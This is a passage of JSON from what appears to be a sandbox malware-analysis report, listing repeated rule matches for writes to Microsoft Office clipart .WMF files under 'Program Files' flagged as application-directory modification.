[ { "ref_id": "gfn_41111", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00563_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00578_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00578_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41120", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00578_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00608_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00608_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41127", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00608_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00633_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00633_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41134", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00633_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00640_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00640_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41143", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00640_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00668_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00668_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41154", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00668_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00685_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00685_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41163", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00685_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00686_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00686_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41170", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00686_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00693_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00693_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41177", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00693_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00720_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00720_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41184", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00720_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00723_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00723_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41191", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00723_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00726_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00726_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41198", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00726_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00737_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00737_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41209", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00737_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00833_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00833_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41220", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00833_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00898_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00898_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41227", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00898_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00934_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00934_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41234", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00934_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00998_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00998_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41241", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00998_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01160_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe01160_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41248", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe01160_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01172_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe01172_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41255", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe01172_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01191_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe01191_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41262", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe01191_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01661_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe01661_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41269", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe01661_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01797_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe01797_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41276", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe01797_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02120_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02120_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41283", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02120_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02169_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02169_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41290", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02169_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02262_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02262_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41297", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02262_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02263_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02263_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41306", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02263_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02265_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02265_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41317", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02265_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02267_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02267_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41326", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02267_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02270_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02270_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41335", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02270_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02278_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02278_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41344", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02278_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02280_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02280_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41355", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02280_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02282_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02282_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41364", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02282_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02285_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02285_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41373", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02285_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 